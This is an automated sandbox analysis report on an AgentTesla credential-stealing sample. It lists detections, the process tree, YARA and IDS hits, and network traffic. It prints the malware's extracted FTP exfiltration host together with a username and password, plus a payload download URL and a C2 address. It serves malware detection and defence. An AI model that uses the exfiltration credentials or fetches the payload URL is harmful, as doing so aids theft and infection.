Windows Analysis Report
Kuwait Offer48783929281-BZ2.exe

Overview

General Information

Sample name: Kuwait Offer48783929281-BZ2.exe
Analysis ID: 1528672
MD5: b77b84072a85329568ea006b1b7f4201
SHA1: d9b623c149eeabf151684d852b7d0ab431712c42
SHA256: 46044e8e01547f2456e27e8b15c667f004a2c26fd647f3cecc71de19015d96c0
Tags: exe, user-lowmal3
Infos:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large strings
AI detected suspicious sample
Allocates memory in foreign processes
Connects to many ports of the same IP (likely port scanning)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SGDT)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Kuwait Offer48783929281-BZ2.exe (PID: 7480 cmdline: "C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe" MD5: B77B84072A85329568EA006B1B7F4201)
    • InstallUtil.exe (PID: 7612 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • Hxfzsthbd.exe (PID: 7764 cmdline: "C:\Users\user\AppData\Roaming\Hxfzsthbd.exe" MD5: B77B84072A85329568EA006B1B7F4201)
    • InstallUtil.exe (PID: 7848 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • Hxfzsthbd.exe (PID: 8144 cmdline: "C:\Users\user\AppData\Roaming\Hxfzsthbd.exe" MD5: B77B84072A85329568EA006B1B7F4201)
    • InstallUtil.exe (PID: 7232 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.alternatifplastik.com", "Username": "fgghv@alternatifplastik.com", "Password": "Fineboy777@"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Source | Rule | Description | Author | Strings
00000003.00000002.1505492848.0000000003600000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000003.00000002.1505492848.0000000003600000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000000.00000002.1348809721.00000000030A7000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000000.00000002.1366255411.0000000006440000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000004.00000002.1573523640.00000000028DE000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

                    Source | Rule | Description | Author | Strings
                    0.2.Kuwait Offer48783929281-BZ2.exe.6440000.9.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
                    3.2.Hxfzsthbd.exe.3600ce8.5.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
                    3.2.Hxfzsthbd.exe.3600ce8.5.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
                    3.2.Hxfzsthbd.exe.3600ce8.5.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen |
                    • 0x31261:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                    • 0x312d3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                    • 0x3135d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                    • 0x313ef:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                    • 0x31459:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                    • 0x314cb:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                    • 0x31561:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                    • 0x315f1:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                    3.2.Hxfzsthbd.exe.3600ce8.5.unpack | MALWARE_Win_AgentTeslaV2 | AgenetTesla Type 2 Keylogger payload | ditekSHen |
                    • 0x2e67c:$s2: GetPrivateProfileString
                    • 0x2dd9d:$s3: get_OSFullName
                    • 0x2f38e:$s5: remove_Key
                    • 0x2f56c:$s5: remove_Key
                    • 0x3047a:$s6: FtpWebRequest
                    • 0x31243:$s7: logins
                    • 0x317b5:$s7: logins
                    • 0x344ba:$s7: logins
                    • 0x34578:$s7: logins
                    • 0x35e7e:$s7: logins
                    • 0x3511c:$s9: 1.85 (Hash, version 2, native byte-order)

                    System Summary

                    Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, ProcessId: 7480, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Hxfzsthbd

                    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                    2024-10-08T08:56:03.760641+0200 | 2029927 | 1 | A Network Trojan was detected | 192.168.2.9 | 49742 | 5.2.84.236 | 21 | TCP
                    2024-10-08T08:56:16.368764+0200 | 2029927 | 1 | A Network Trojan was detected | 192.168.2.9 | 49821 | 5.2.84.236 | 21 | TCP
                    2024-10-08T08:56:25.599272+0200 | 2029927 | 1 | A Network Trojan was detected | 192.168.2.9 | 49883 | 5.2.84.236 | 21 | TCP

                    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                    2024-10-08T08:56:04.458622+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.9 | 49758 | 5.2.84.236 | 55304 | TCP
                    2024-10-08T08:56:04.463815+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.9 | 49758 | 5.2.84.236 | 55304 | TCP
                    2024-10-08T08:56:17.062169+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.9 | 49840 | 5.2.84.236 | 51505 | TCP
                    2024-10-08T08:56:17.067407+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.9 | 49840 | 5.2.84.236 | 51505 | TCP
                    2024-10-08T08:56:26.305049+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.9 | 49897 | 5.2.84.236 | 62301 | TCP
                    2024-10-08T08:56:26.310354+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.9 | 49897 | 5.2.84.236 | 62301 | TCP

                    AV Detection

                    Source: 3.2.Hxfzsthbd.exe.3600ce8.5.raw.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.alternatifplastik.com", "Username": "fgghv@alternatifplastik.com", "Password": "Fineboy777@"}
                    Source: wymascensores.com | Virustotal: Detection: 11%
                    Source: https://wymascensores.com/dfsd/Wulwtq.mp310NWLLwEk5H | Virustotal: Detection: 11%
                    Source: https://wymascensores.com/dfsd/Wulwtq.mp3 | Virustotal: Detection: 11%
                    Source: https://wymascensores.com | Virustotal: Detection: 6%
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe | ReversingLabs: Detection: 34%
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe | Virustotal: Detection: 27%
                    Source: Kuwait Offer48783929281-BZ2.exe | ReversingLabs: Detection: 34%
                    Source: Kuwait Offer48783929281-BZ2.exe | Virustotal: Detection: 27%
                    Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe | Joe Sandbox ML: detected
                    Source: Kuwait Offer48783929281-BZ2.exe | Joe Sandbox ML: detected
                    Source: Kuwait Offer48783929281-BZ2.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknown | HTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.9:49717 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.9:49800 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.9:49856 version: TLS 1.2
                    Source: Kuwait Offer48783929281-BZ2.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1348809721.00000000030A7000.00000004.00000800.00020000.00000000.sdmp, Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1357567810.0000000004175000.00000004.00000800.00020000.00000000.sdmp, Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1366854084.00000000066B0000.00000004.08000000.00040000.00000000.sdmp, Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1357567810.0000000004069000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.00000000034B9000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.0000000003575000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1478760914.00000000027F9000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000008.00000002.1571205527.0000000003015000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000008.00000002.1598572369.0000000003BF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1348809721.00000000030A7000.00000004.00000800.00020000.00000000.sdmp, Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1357567810.0000000004175000.00000004.00000800.00020000.00000000.sdmp, Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1366854084.00000000066B0000.00000004.08000000.00040000.00000000.sdmp, Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1357567810.0000000004069000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.00000000034B9000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.0000000003575000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1478760914.00000000027F9000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000008.00000002.1571205527.0000000003015000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000008.00000002.1598572369.0000000003BF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1365742147.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.0000000003972000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1365742147.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.0000000003972000.00000004.00000800.00020000.00000000.sdmp

                    Networking

                    Source: Network traffic | Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.9:49758 -> 5.2.84.236:55304
                    Source: Network traffic | Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.9:49742 -> 5.2.84.236:21
                    Source: Network traffic | Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.9:49821 -> 5.2.84.236:21
                    Source: Network traffic | Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.9:49840 -> 5.2.84.236:51505
                    Source: Network traffic | Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.9:49897 -> 5.2.84.236:62301
                    Source: Network traffic | Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.9:49883 -> 5.2.84.236:21
                    Source: global traffic | TCP traffic: 5.2.84.236 ports 62301,1,2,55304,21,51505
                    Source: global traffic | TCP traffic: 192.168.2.9:49758 -> 5.2.84.236:55304
                    Source: global traffic | HTTP traffic detected: GET /dfsd/Wulwtq.mp3 HTTP/1.1 Host: wymascensores.com Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /dfsd/Wulwtq.mp3 HTTP/1.1 Host: wymascensores.com Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /dfsd/Wulwtq.mp3 HTTP/1.1 Host: wymascensores.com Connection: Keep-Alive
                    Source: Joe Sandbox View | IP Address: 67.212.175.162
                    Source: Joe Sandbox View | IP Address: 5.2.84.236
                    Source: Joe Sandbox View | ASN Name: ALASTYRTR
                    Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknown | FTP traffic detected: 5.2.84.236:21 -> 192.168.2.9:49742
                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                      220-You are user number 2 of 100 allowed.
                      220-Local time is now 09:56. Server port: 21.
                      220-This is a private system - No anonymous login
                      220-IPv6 connections are also welcome on this server.
                      220 You will be disconnected after 10 minutes of inactivity.
                    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global traffic | HTTP traffic detected: GET /dfsd/Wulwtq.mp3 HTTP/1.1 Host: wymascensores.com Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /dfsd/Wulwtq.mp3 HTTP/1.1 Host: wymascensores.com Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /dfsd/Wulwtq.mp3 HTTP/1.1 Host: wymascensores.com Connection: Keep-Alive
                    Source: global traffic | DNS traffic detected: DNS query: wymascensores.com
                    Source: global traffic | DNS traffic detected: DNS query: ftp.alternatifplastik.com
                    Source: unknown | Network traffic detected: HTTP traffic on port 49800 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49856 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
                    Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49856
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49800
                    Source: unknown | HTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.9:49717 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.9:49800 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.9:49856 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.40d00c8.3.raw.unpack, SKTzxzsJw.cs | .Net Code: RePIUNFdBeM

                    System Summary

                    Source: 3.2.Hxfzsthbd.exe.3600ce8.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 3.2.Hxfzsthbd.exe.3600ce8.5.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 2.2.InstallUtil.exe.600000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 2.2.InstallUtil.exe.600000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.40d00c8.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.40d00c8.3.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 3.2.Hxfzsthbd.exe.3600ce8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 3.2.Hxfzsthbd.exe.3600ce8.5.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.40d00c8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.40d00c8.3.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.4069550.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.4069550.1.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: Kuwait Offer48783929281-BZ2.exe, License.csLong String: Length: 10317
                    Source: Hxfzsthbd.exe.0.dr, License.csLong String: Length: 10317
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.431d1f8.6.raw.unpack, License.csLong String: Length: 10317
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Code function: 0_2_0634D5E8 NtProtectVirtualMemory,0_2_0634D5E8
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Code function: 0_2_0634EA90 NtResumeThread,0_2_0634EA90
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Code function: 0_2_0634D5E0 NtProtectVirtualMemory,0_2_0634D5E0
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, Code function: 0_2_0634EA88 NtResumeThread,0_2_0634EA88
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Code function: 3_2_0579D5E8 NtProtectVirtualMemory,3_2_0579D5E8
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Code function: 3_2_0579EA90 NtResumeThread,3_2_0579EA90
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Code function: 3_2_0579D5E0 NtProtectVirtualMemory,3_2_0579D5E0
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Code function: 3_2_0579EA88 NtResumeThread,3_2_0579EA88
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Code function: 8_2_05CBD5E8 NtProtectVirtualMemory,8_2_05CBD5E8
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Code function: 8_2_05CBEA90 NtResumeThread,8_2_05CBEA90
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Code function: 8_2_05CBD5E0 NtProtectVirtualMemory,8_2_05CBD5E0
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, Code function: 8_2_05CBEA88 NtResumeThread,8_2_05CBEA88
                    Source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1348809721.00000000030A7000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilename vs Kuwait Offer48783929281-BZ2.exe
                    Source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1348809721.00000000030A7000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Kuwait Offer48783929281-BZ2.exe
                    Source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1357567810.0000000004175000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Kuwait Offer48783929281-BZ2.exe
                    Source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1366854084.00000000066B0000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Kuwait Offer48783929281-BZ2.exe
                    Source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1365742147.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Kuwait Offer48783929281-BZ2.exe
                    Source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1348809721.000000000321B000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilename7dfcfdf2-d881-49c9-a39e-708aca656f85.exe4 vs Kuwait Offer48783929281-BZ2.exe
                    Source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1357567810.0000000004220000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameScjghq.dll" vs Kuwait Offer48783929281-BZ2.exe
                    Source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1357567810.0000000004220000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameDwdxhtcoji.exe6 vs Kuwait Offer48783929281-BZ2.exe
                    Source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1348001830.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameclr.dllT vs Kuwait Offer48783929281-BZ2.exe
                    Source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1364855917.00000000061C0000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameScjghq.dll" vs Kuwait Offer48783929281-BZ2.exe
                    Source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000000.1317218194.0000000000C82000.00000002.00000001.01000000.00000003.sdmp, Binary or memory string: OriginalFilenameDwdxhtcoji.exe6 vs Kuwait Offer48783929281-BZ2.exe
                    Source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1357567810.0000000004069000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilename7dfcfdf2-d881-49c9-a39e-708aca656f85.exe4 vs Kuwait Offer48783929281-BZ2.exe
                    Source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1357567810.0000000004069000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Kuwait Offer48783929281-BZ2.exe
                    Source: Kuwait Offer48783929281-BZ2.exe, Binary or memory string: OriginalFilenameDwdxhtcoji.exe6 vs Kuwait Offer48783929281-BZ2.exe
                    Source: Kuwait Offer48783929281-BZ2.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 3.2.Hxfzsthbd.exe.3600ce8.5.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 3.2.Hxfzsthbd.exe.3600ce8.5.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 2.2.InstallUtil.exe.600000.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 2.2.InstallUtil.exe.600000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.40d00c8.3.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.40d00c8.3.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 3.2.Hxfzsthbd.exe.3600ce8.5.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 3.2.Hxfzsthbd.exe.3600ce8.5.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.40d00c8.3.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.40d00c8.3.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.4069550.1.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.4069550.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.42333d8.4.raw.unpack, BOT85cX15ubIHapB5PR.cs, Cryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.40d00c8.3.raw.unpack, 4JJG6X.cs, Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.40d00c8.3.raw.unpack, 8C78isHTVco.cs, Cryptographic APIs: 'TransformFinalBlock'
                    Source: classification engine, Classification label: mal100.troj.spyw.evad.winEXE@9/2@2/2
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, File created: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Mutant created: NULL
                    Source: Kuwait Offer48783929281-BZ2.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Kuwait Offer48783929281-BZ2.exe, Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
